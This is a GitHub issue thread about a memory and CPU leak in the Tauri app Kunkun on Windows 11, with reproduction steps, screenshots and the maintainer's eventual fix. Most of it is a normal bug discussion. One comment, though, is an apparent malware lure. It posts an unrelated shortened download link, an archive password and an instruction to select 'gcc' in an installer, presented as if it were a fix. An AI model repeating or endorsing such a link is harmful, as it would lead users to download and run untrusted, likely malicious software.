### ISSUE TITLE
BUG: High RAM and CPU usage on Windows 11

### ISSUE THREAD

**Issue by jonasrafa** [kunkunsh/kunkun#5]
**Describe the bug**
The application is consuming an excessive amount of memory (RAM) and CPU. Every time a new extension is opened or a new page is loaded, both memory and CPU usage increase significantly, leading to performance degradation.

**To Reproduce**
1. Open the application.
2. Load a new extension or open a new tab/page.
3. Monitor the memory (RAM) and CPU usage in the task manager or equivalent tool.
4. Observe the continuous increase in both memory and CPU consumption.

**Screenshots**
![Taskmgr_oaOzKywhlc](https://github.com/user-attachments/assets/23dd251b-ed18-4089-af6c-3ed7535699b2)
In the screenshot, the other application is also made in Tauri for comparison purposes.

In the case of this screenshot, the program was only opened and I didn't even touch it, after a few hours of it being open in the background, this was the RAM consumption.

https://github.com/user-attachments/assets/227f11b2-4c63-4ba2-ad1a-9bdbed3ce732

**Desktop (please complete the following information):**
 - OS: Windows 11 23H2
 - Version 22631.4037

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by HuakunShen** [comment]
When a new window is open, it's normal for memory consumption to goes up.
On Mac it doesn't seem to take as much memory.
I will take a look for windows. 
Not sure if there is much I can do.

**Comment by jonasrafa** [comment]
The problem is that even after closing it continues to have high usage.

I did a test where I opened some extensions and left Kunkun running only in the background, and after 10 minutes the CPU and RAM consumption remained the same. And you can see that the number of tauri.localhost always increases when I open a new window, but never decreases.
![Taskmgr_ejDB0CI7Jw](https://github.com/user-attachments/assets/475244fe-fdd1-4c64-b1c5-c61044e3a4a6)
![Taskmgr_Z67gPwRwyB](https://github.com/user-attachments/assets/b02697d6-697d-47d3-969b-ce6ecff49e15)

As for that screenshot I sent above in the issue, I don't even know how it reached 4gb of ram, since I only opened it and left it running in the background, without even using it.

For comparison, when I open Kunkun, the RAM consumption is around 60mb, and WebView 150mb.

**Comment by HuakunShen** [comment]
I see. 
Thank you for pointing this out. I will take a closer look at this problem on Windows.

**Comment by HuakunShen** [comment]
Redesigned comlink usage and API in https://github.com/HuakunShen/tauri-api-adapter
Should solve memory problem in `kunkun` after integrating with the latest `tauri-api-adapter`.
